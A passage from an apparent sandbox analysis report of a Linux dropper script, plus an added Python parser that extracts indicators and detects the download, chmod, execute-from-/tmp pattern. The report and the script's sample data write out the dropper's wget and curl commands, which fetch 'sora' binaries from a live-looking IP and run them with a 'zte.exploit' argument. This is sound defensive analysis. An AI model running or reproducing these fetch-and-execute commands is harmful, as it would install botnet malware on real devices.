| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 03:05
Reported
2024-10-18 03:08
Platform
debian9-mipsel-20240611-en
Max time kernel
29s
Max time network
30s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh | N/A |
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
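The process entries above (in both behavioral runs) repeat one loop per architecture: wget and curl fetch http://93.123.85.141/bins/sora.<arch>, cat reads the payload, chmod +x marks the files in the working directory executable, and /tmp/robben is launched with the argument zte.exploit. Two details only follow from reading the report as a whole: the argv of `cat sora.<arch>` shows no redirection (shell redirects are not part of argv), so it is the "Writes file to tmp directory" signature, the script opening /tmp/robben for modification, that tells us where cat's output went; and the chmod target list includes the sandbox's own systemd-private-… directory, which is consistent with a `chmod +x *` glob expanded in /tmp rather than a fixed file list (an inference, not something the report states). The script below is an added example, not code from the report or from the analysed sample. It parses the report's own two-line layout (a process path, then its argv in square brackets), pulls out the indicators a responder wants (URLs, hosting IP, targeted architectures, the dropped binary and its launch argument), and flags the fetch, chmod +x, execute-from-/tmp chain. The embedded sample is a constructed subset of the entries listed above.

```python
"""Parse sandbox process entries, extract IOCs, and flag the
download -> chmod +x -> execute-from-/tmp chain.  Added example; not code
from the report or the analysed sample.  Assumes only the report's
two-line layout: a process path, then its argv in square brackets."""
import re
from urllib.parse import urlparse

# Constructed sample: the first two architecture iterations of the
# behavioral4 process list above, copied in the report's own format.
SAMPLE = """\
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
"""

URL_RE = re.compile(r"https?://[^\s\]]+")


def parse_processes(text):
    """Return [(process_path, argv_list)] from the two-line report layout."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    procs, i = [], 0
    while i + 1 < len(lines):
        path, cmd = lines[i], lines[i + 1]
        if cmd.startswith("[") and cmd.endswith("]"):
            procs.append((path, cmd[1:-1].split()))
            i += 2
        else:  # a path line with no argv line after it: skip it
            i += 1
    return procs


def _urls(argv):
    return [t for t in argv if URL_RE.fullmatch(t)]


def extract_iocs(procs):
    """Network and file indicators, de-duplicated, first-seen order kept."""
    urls = list(dict.fromkeys(u for _, argv in procs for u in _urls(argv)))
    hosts = sorted({urlparse(u).hostname for u in urls})
    # Payload names are <family>.<arch>; the suffix tells which CPUs are targeted.
    names = [urlparse(u).path.rsplit("/", 1)[-1] for u in urls]
    arches = sorted({n.split(".", 1)[1] for n in names if "." in n})
    # Anything launched as ./name from /tmp is a dropped binary; keep its args.
    executed = list(dict.fromkeys(
        (path, tuple(argv[1:])) for path, argv in procs
        if path.startswith("/tmp/") and argv and argv[0].startswith("./")))
    return {"urls": urls, "hosts": hosts, "arches": arches, "executed": executed}


def detect_drop_and_exec(procs):
    """Flag each execution of a /tmp file that was preceded, in order, by a
    URL fetch (wget/curl) and a chmod +x naming that file."""
    hits, fetched, made_exec = [], False, set()
    for path, argv in procs:
        if not argv:
            continue
        cmd = argv[0].rsplit("/", 1)[-1]
        if cmd in ("wget", "curl") and _urls(argv):
            fetched = True
        elif cmd == "chmod" and "+x" in argv:
            made_exec.update(t for t in argv[1:] if t != "+x")
        elif (fetched and path.startswith("/tmp/")
              and path.rsplit("/", 1)[-1] in made_exec):
            hits.append((path, argv[1:]))
    return hits


if __name__ == "__main__":
    procs = parse_processes(SAMPLE)
    for key, value in extract_iocs(procs).items():
        print(f"{key}: {value}")
    for path, args in detect_drop_and_exec(procs):
        print(f"ALERT drop-and-exec: {path} {' '.join(args)}")
```

Run against the full process list of either behavioral run, the URL list yields the 14 architecture variants served from the single host on port 80, matching the 28 connections (one wget and one curl per variant) in the Network table, and every iteration produces one drop-and-exec hit for /tmp/robben with the argument zte.exploit. The detector deliberately keys on the chmod target name rather than on the fetched file name, because the fetched name (sora.<arch>) and the executed name (robben) differ in this sample.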
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |